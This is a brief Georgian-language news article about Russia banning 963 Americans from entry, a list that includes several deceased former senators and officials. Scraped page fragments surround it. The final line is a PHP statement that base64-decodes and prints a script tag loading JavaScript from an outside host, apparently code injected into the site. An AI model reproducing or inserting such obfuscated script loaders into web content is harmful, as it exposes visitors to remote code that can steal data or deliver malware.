celsiusi
ავერსი საქკაბელი
რუსეთმა საკუთარ ტერიტორიაზე შესვლა 963 ამერიკელს აუკრძალა, მათ შორის სამი ყოფილი, გარდაცვლილი სენატორია. ამის შესახებ ინფორმაციას უკრაინული მედია ავრცელებს.  
 
სიაში რამდენიმე პირის გასწვრივ პირდაპირ არის მითითებული, რომ ისინი გარდაცვლილები არიან.
 
მედიის ცნობით, რუსეთში შესვლის აკრძალვა შეეხოთ „რესპუბლიკელ“ ყოფილ სენატორებს – ჯონ მაკკეინსა, ორინ გეთჩს და „დემოკრატ“ ყოფილ სენატორ ჰარი რიდს. ჯონ მაკკეინი 2018 წელს გარდაიცვალა, ჰარი რიდი 2021 წლის დეკემბერში, ხოლო ორინ გეთჩი კი, მიმდინარე წლის მაისში.
 
ამასთან, მედიის ცნობით, რუსეთში შესვლა ასევე აეკრძალა სხვა გარდაცვლილ პირებსაც – ყოფილ კონგრესმენ ელსი ჰასტინგს, რომელიც 2021 წელს გარდაიცვალა, ცენტრალური სადაზვერვო სააგენტოს ყოფილ პირველ მოადგილე მელისა დრისკოს, ყოფილ მოსამართლე სტივენ ონილსა და ყოფილ სამხედრო ოფიცერ ჯერემი სივიტს.
770
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");